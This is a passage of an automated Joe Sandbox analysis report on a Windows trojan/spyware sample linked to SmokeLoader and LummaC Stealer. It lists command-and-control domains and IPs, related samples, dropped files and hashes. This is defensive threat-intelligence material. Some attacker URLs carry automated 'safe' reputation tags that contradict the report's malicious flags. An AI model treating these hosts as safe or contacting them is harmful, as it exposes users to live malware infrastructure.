                                                                https://ac.ecosia.org/autocomplete?q=RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://search.yahoo.com?fr=crmas_sfpRegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t46A3.exe.1.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://fiancejiveimp.fun/apilRegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://fiancejiveimp.fun:80/apiRegAsm.exe, 0000000B.00000002.1051881993.00000000038A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#46A3.exe.1.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://java.sun.comexplorer.exe, 00000001.00000000.897634595.00000000067AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://fiancejiveimp.fun/iRegAsm.exe, 0000000B.00000002.1050683649.0000000000EB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://fiancejiveimp.fun/RegAsm.exe, 0000000B.00000002.1050683649.0000000000EB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.21.1.18
                                                                      		malenursenect.funUnited States
                                                                      		13335CLOUDFLARENETUStrue
                                                                      211.59.14.90
                                                                      		unknownKorea Republic of
                                                                      		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                      172.67.171.76
                                                                      		kingpirate.ruUnited States
                                                                      		13335CLOUDFLARENETUStrue
                                                                      175.126.109.15
                                                                      		unknownKorea Republic of
                                                                      		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                      189.232.58.103
                                                                      		unknownMexico
                                                                      		8151UninetSAdeCVMXtrue
                                                                      193.149.185.139
                                                                      		unknownDenmark
                                                                      		15411DANISCODKtrue
                                                                      172.67.137.125
                                                                      		fiancejiveimp.funUnited States
                                                                      		13335CLOUDFLARENETUStrue
                                                                      211.40.39.251
                                                                      		gudintas.atKorea Republic of
                                                                      		3786LGDACOMLGDACOMCorporationKRtrue
                                                                      211.171.233.129
                                                                      		unknownKorea Republic of
                                                                      		3786LGDACOMLGDACOMCorporationKRtrue
                                                                      211.104.254.139
                                                                      		unknownKorea Republic of
                                                                      		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                      104.21.81.17
                                                                      		unknownUnited States
                                                                      		13335CLOUDFLARENETUStrue
                                                                      172.67.151.219
                                                                      		unknownUnited States
                                                                      		13335CLOUDFLARENETUStrue
                                                                      186.13.17.220
                                                                      		unknownArgentina
                                                                      		11664TechtelLMDSComunicacionesInteractivasSAARtrue
                                                                      91.227.16.22
                                                                      		h170811.srv22.test-hf.suRussian Federation
                                                                      		207027EXIMIUS-ASRUtrue

                                                                      General Information

                                                                      Joe Sandbox Version:38.0.0 Ammolite
                                                                      Analysis ID:1318864
                                                                      Start date and time:2023-10-03 18:01:06 +02:00
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 11m 44s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:21
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample file name:file.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@12/11@112/14
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 97%
                                                                      • Number of executed functions: 141
                                                                      • Number of non-executed functions: 266
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, g.bing.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: file.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      09:02:19Task SchedulerRun new task: Firefox Default Browser Agent F938D9C14C88DE76 path: C:\Users\user\AppData\Roaming\wfshtit
                                                                      18:02:01API Interceptor448138x Sleep call for process: explorer.exe modified
                                                                      18:02:39API Interceptor1x Sleep call for process: 46A3.exe modified
                                                                      18:02:40API Interceptor1x Sleep call for process: RegAsm.exe modified
                                                                      18:02:45API Interceptor1x Sleep call for process: AppLaunch.exe modified
                                                                      18:02:47API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.21.1.18file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • malenursenect.fun/api
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • malenursenect.fun/api
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • malenursenect.fun/api
                                                                      211.59.14.90file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      BgL6t8Fl3u.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      lpD7vDCZmS.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      WYeXo5gWQQ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      SrHYcNDaiS.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      dVWTaYnmca.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • taibi.at/tmp/
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • taibi.at/tmp/
                                                                      SecuriteInfo.com.Win32.PWSX-gen.32353.16014.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • gudintas.at/tmp/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      gudintas.atfile.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 95.107.163.44
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 211.171.233.129
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 186.182.55.44
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 211.181.24.133
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 211.53.230.67
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 190.224.203.37
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 211.104.254.139
                                                                      file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                      • 95.107.163.44
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 181.170.86.159
                                                                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoaderBrowse
                                                                      • 211.59.14.90
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 186.182.55.44
                                                                      VYACm4h0WB.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                      • 186.147.159.19
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 211.119.84.112
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 115.88.24.200
                                                                      uDtn1lMsJR.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 190.12.87.61
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 37.34.248.24
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 211.171.233.129
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 187.18.108.158
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 84.224.216.79
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 124.43.19.179
                                                                      kingpirate.rufile.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      uDtn1lMsJR.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 104.21.29.36
                                                                      OMfhJ6V4hm.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      malenursenect.funfile.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 172.67.151.219
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 172.67.151.219
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 104.21.1.18

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSclient.exeGet hashmaliciousUrsnif, Strela StealerBrowse
                                                                      • 104.21.58.17
                                                                      http://cfc4lrvda605zyz4t7jn.uohfglr.ruGet hashmaliciousUnknownBrowse
                                                                      • 104.21.38.55
                                                                      #U0417#U043e#U0440#U043a#U0438#U0439_#U0413#U043b#U0430#U0437_5.409_(setup).exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.191.205
                                                                      VisualStudioSetup.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.191.205
                                                                      ATT00001.htmGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      https://divisioncreatives.co.za/fromf/freedom/yo7ceb/YnVybnNyQHNjaG5laWRlci5jb20=Get hashmaliciousUnknownBrowse
                                                                      • 104.17.2.184
                                                                      utweb_installer.exeGet hashmaliciousMars StealerBrowse
                                                                      • 104.18.20.226
                                                                      VisualStudioSetup.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.191.205
                                                                      https://www.landonschafer.com/assis/siryes/py/8nyzou/amF5c29uQGNoYW5naWFpcnBvcnQuY29tGet hashmaliciousUnknownBrowse
                                                                      • 104.17.3.184
                                                                      PROD_Start_DriverPack.htaGet hashmaliciousCobalt StrikeBrowse
                                                                      • 104.21.16.11
                                                                      https://intelbrasniteroi.com.br/filesGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.10.207
                                                                      Pedido_de_snorkel88793001.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.21.26.54
                                                                      utweb_installer.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 104.18.20.226
                                                                      https://divisioncreatives.co.za/fromf/freedom/yo7ceb/YnVybnNyQHNjaG5laWRlci5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                      • 172.67.165.41
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 172.67.151.219
                                                                      ScreenShare_Win_5.5.0.3459.exeGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      proccexp.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.191.205
                                                                      https://tracker.club-os.com/campaign/click?msgId=&test=true&target=https://danholtvideo.com/fromf/freedom/xqqw6t/dGVycnkuc2libGV5QGFwcmlhLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                      • 172.67.165.41
                                                                      https://siper.yourstoreonline.tn/framein/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.17.25.14
                                                                      DOC2045.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 172.67.195.186
                                                                      CLOUDFLARENETUSclient.exeGet hashmaliciousUrsnif, Strela StealerBrowse
                                                                      • 104.21.58.17
                                                                      http://cfc4lrvda605zyz4t7jn.uohfglr.ruGet hashmaliciousUnknownBrowse
                                                                      • 104.21.38.55
                                                                      #U0417#U043e#U0440#U043a#U0438#U0439_#U0413#U043b#U0430#U0437_5.409_(setup).exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.191.205
                                                                      VisualStudioSetup.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.191.205
                                                                      ATT00001.htmGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      https://divisioncreatives.co.za/fromf/freedom/yo7ceb/YnVybnNyQHNjaG5laWRlci5jb20=Get hashmaliciousUnknownBrowse
                                                                      • 104.17.2.184
                                                                      utweb_installer.exeGet hashmaliciousMars StealerBrowse
                                                                      • 104.18.20.226
                                                                      VisualStudioSetup.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.191.205
                                                                      https://www.landonschafer.com/assis/siryes/py/8nyzou/amF5c29uQGNoYW5naWFpcnBvcnQuY29tGet hashmaliciousUnknownBrowse
                                                                      • 104.17.3.184
                                                                      PROD_Start_DriverPack.htaGet hashmaliciousCobalt StrikeBrowse
                                                                      • 104.21.16.11
                                                                      https://intelbrasniteroi.com.br/filesGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.10.207
                                                                      Pedido_de_snorkel88793001.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.21.26.54
                                                                      utweb_installer.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 104.18.20.226
                                                                      https://divisioncreatives.co.za/fromf/freedom/yo7ceb/YnVybnNyQHNjaG5laWRlci5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                      • 172.67.165.41
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 172.67.151.219
                                                                      ScreenShare_Win_5.5.0.3459.exeGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      proccexp.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.191.205
                                                                      https://tracker.club-os.com/campaign/click?msgId=&test=true&target=https://danholtvideo.com/fromf/freedom/xqqw6t/dGVycnkuc2libGV5QGFwcmlhLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                      • 172.67.165.41
                                                                      https://siper.yourstoreonline.tn/framein/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.17.25.14
                                                                      DOC2045.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 172.67.195.186
                                                                      SKB-ASSKBroadbandCoLtdKRcsvz5bOQQA.elfGet hashmaliciousMiraiBrowse
                                                                      • 221.140.92.215
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 211.59.14.90
                                                                      wsWcTw2vNt.elfGet hashmaliciousMiraiBrowse
                                                                      • 58.121.228.70
                                                                      3ush6bY3dj.elfGet hashmaliciousMiraiBrowse
                                                                      • 58.238.209.68
                                                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 218.38.47.223
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 175.119.10.231
                                                                      9I6G051bAx.elfGet hashmaliciousMiraiBrowse
                                                                      • 58.124.123.110
                                                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 1.253.209.227
                                                                      payload_carved.dll.dllGet hashmaliciousEmotetBrowse
                                                                      • 218.38.121.17
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      • 123.213.233.131
                                                                      7Un76shVUa.elfGet hashmaliciousUnknownBrowse
                                                                      • 180.66.124.10
                                                                      8qH833yMA5.elfGet hashmaliciousMiraiBrowse
                                                                      • 211.179.203.223
                                                                      file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                      • 211.59.14.90
                                                                      rbwbOPJNxg.elfGet hashmaliciousMiraiBrowse
                                                                      • 58.232.172.18
                                                                      rwZFZF8WCp.elfGet hashmaliciousMiraiBrowse
                                                                      • 221.143.118.8
                                                                      EOdKguiKjr.elfGet hashmaliciousMiraiBrowse
                                                                      • 116.124.2.216
                                                                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoaderBrowse
                                                                      • 211.59.14.90
                                                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 222.234.98.89
                                                                      Ceu6dXZpSO.elfGet hashmaliciousMiraiBrowse
                                                                      • 175.123.125.136
                                                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 110.12.142.121

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousStealc, Vidar, onlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      Superior Electric Company Inc.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                      • 172.67.171.76
                                                                      Myguestlist.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.171.76
                                                                      Myguestlist.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.171.76
                                                                      file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                      • 172.67.171.76
                                                                      avast_vpn_online_setup.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                      • 172.67.171.76
                                                                      Y7b2A9M12e.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      YWlJj2wCpx.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      hYANdwoB2y.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      Y7b2A9M12e.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      zHNcWWv4Yf.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      xVrBb3y7o2.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      YWlJj2wCpx.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      hYANdwoB2y.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      rWxRUfL9K3.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      ogQGRS0j7g.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      GkLO4YQZf4.exeGet hashmaliciousonlyLoggerBrowse
                                                                      • 172.67.171.76
                                                                      PO_and_Order_specification.docx.docGet hashmaliciousUnknownBrowse
                                                                      • 172.67.171.76

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\BB04.exefile.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                        file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                          file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                            C:\Users\user\AppData\Local\Temp\46A3.exefile.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                              C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllPS05spA6ci.exeGet hashmaliciousLummaC StealerBrowse
                                                                                indicat.exeGet hashmaliciousVidarBrowse
                                                                                  SaluC9P2HK.exeGet hashmaliciousAmadey, Raccoon Stealer v2Browse
                                                                                    file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                                      file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                        indicat.exeGet hashmaliciousVidarBrowse
                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                            rj51W7g00R.exeGet hashmaliciousRedLineBrowse
                                                                                              UIB9S0uVzu.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                egNeejjND4.exeGet hashmaliciousRedLineBrowse
                                                                                                  toolspub1.exeGet hashmaliciousBabuk, Djvu, Fabookie, RedLine, SmokeLoader, zgRATBrowse
                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BB04.exe_3d275490ec649ba0a1e3a9adfe4f6cfc2f8f26_c12592ba_151e62bf\Report.wer

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.7436034736953562
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:qLbFjphZe/FORh7D7ebS3pXIQcQbc68AcEocw3s1+HbHg/8BRTf32kEJ8Imov9O9:GbvhM/FMHFPS4Sjpq/u7sGS274Itr
                                                                                                        MD5:C2013DFAA2C657B3D1519137430D5BEB
                                                                                                        SHA1:7EEC8B21E4656341BA30AD8A8B32154C75B6840E
                                                                                                        SHA-256:797ADC1BFB8258CA7B157FC01271B61D2065EE856302F8E02859BBD28E91CAC0
                                                                                                        SHA-512:34BF0EE8D7768A4450D4F29FF559733ECA1ED803FE2708E4A2312685211DB1A06D764BAC76CBDE0781102760E721FFBDF14CA3EE36C0DF3A7495C0FD723A05C3
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.0.8.2.2.5.6.5.7.6.6.2.4.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.0.8.2.2.5.6.6.1.0.9.9.9.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.6.9.e.8.4.2.-.c.d.6.4.-.4.9.7.4.-.a.6.f.8.-.7.8.c.0.6.4.7.8.d.7.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.e.b.2.c.8.9.-.4.b.0.3.-.4.b.5.0.-.b.9.0.1.-.5.5.c.7.3.8.a.9.b.6.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.B.0.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.d.4.-.0.0.0.1.-.0.0.2.8.-.6.2.2.6.-.9.e.0.b.1.3.f.6.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.d.d.4.9.4.f.2.b.3.1.7.0.0.a.e.8.9.0.7.a.b.a.9.a.d.7.2.d.4.3.7.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.f.e.d.d.5.e.f.3.9.f.2.3.2.5.9.6.3.e.f.e.7.7.4.2.4.0.9.9.8.d.1.b.e.6.c.a.c.d.!.B.B.0.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.0././.0.3.:.

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B7B.tmp.dmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 14 streams, Tue Oct 3 16:02:45 2023, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):42352
                                                                                                        Entropy (8bit):1.840845593703933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:5/8SXO8dGY1pJh1f0i7dqIaYv9ZLltvb/e96FJv8e9/URvF2miFrWIXoWIxUIOui:aSB1p/+OdtZL/y96Fl+dJRdSuKnDn
                                                                                                        MD5:E6AD0A1DB1E5033FF2ACC19BE1A5FF84
                                                                                                        SHA1:85C3AB14A0C9967FCAE955C117B9AB9CBA9D8AE3
                                                                                                        SHA-256:8D1FF721ACB4EAFF6F70215CE87A9A5F2D53CECCF074A170AF2DFC490A980475
